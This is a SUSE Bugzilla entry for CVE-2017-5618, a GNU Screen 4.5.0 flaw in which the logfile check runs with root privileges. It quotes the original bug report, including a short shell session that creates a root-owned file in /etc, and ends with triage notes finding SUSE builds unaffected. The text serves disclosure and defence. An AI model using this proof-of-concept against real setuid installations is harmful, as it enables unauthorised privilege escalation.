Bugzilla – Bug 1021743
VUL-0: CVE-2017-5618: screen: privilege escalation via log file
Last modified: 2017-01-29 16:45:14 UTC
https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html

From: anonymous
Subject: [screen-devel] [bug #50142] root exploit 4.5.0
Date: Tue, 24 Jan 2017 19:05:10 +0000 (UTC)
User-agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0

URL: <http://savannah.gnu.org/bugs/?50142>

Summary: root exploit 4.5.0
Project: GNU Screen
Submitted by: None
Submitted on: Tue 24 Jan 2017 07:05:09 PM UTC
Category: Program Logic
Severity: 3 - Normal
Priority: 5 - Normal
Status: None
Privacy: Private
Assigned to: None
Open/Closed: Open
Discussion Lock: Any
Release: None
Fixed Release: None
Planned Release: None
Work Required: None

_______________________________________________________

Details:

Commit f86a374 ("screen.c: adding permissions check for the logfile name", 2015-11-04)

The check opens the logfile with full root privileges. This allows us to truncate any file or create a root-owned file with any contents in any directory and can be easily exploited to full root access in several ways.

> address@hidden:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> address@hidden:~$ id
> uid=125(buczek) gid=125(buczek) groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> address@hidden:~$ cd /etc
> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> address@hidden:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> address@hidden:/etc (master)$ cat bla.bla
> fail
> address@hidden:/etc (master)$

Donald Buczek <address@hidden>

=============

Uhm, the executing screen process already runs as root? Not sure about this

References:
http://seclists.org/oss-sec/2017/q1/181
https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
http://savannah.gnu.org/bugs/?50142
Debian runs setgid utmp: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00027.html
http://git.savannah.gnu.org/cgit/screen.git/commit/?id=c575c40c9bd7653470639da32e06faed0a9b2ec4
http://git.savannah.gnu.org/cgit/screen.git/commit/?h=screen-v4&id=5460f5d28c01a9a58e021eb1dffef2965e629d58
bugbot adjusting priority
Our screen is not setuid nor setgid, as we use the utempter helper. Issue does not reproduce.
The first GNU screen release to contain this issue is v.4.5.0: SLE not affected. openSUSE Leap, Tumbleweed not affected (4.4.0). Base:System/screen has 4.5.0 with affected code. However, the issue relies on setuid/setgid. Resolving issue.